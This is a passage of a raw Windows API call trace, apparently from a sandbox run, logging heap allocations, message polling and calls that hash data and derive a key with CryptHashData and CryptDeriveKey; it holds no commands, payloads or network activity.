(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0228.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e513d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0228.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0228.451] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0228.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0228.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.451] CryptHashData (hHash=0xa87490, pbData=0x2e550d8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0228.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0228.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0228.452] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0228.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0228.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0228.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0228.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0228.453] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0228.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0228.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0228.453] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0228.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0228.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0228.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0228.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0228.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0228.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0228.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0228.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0228.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0228.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0228.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51568 [0228.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51568, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0228.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.466] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0228.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0228.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0228.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.467] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0228.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0228.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0228.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0228.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0228.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0228.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0228.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0228.470] HeapFree (in: 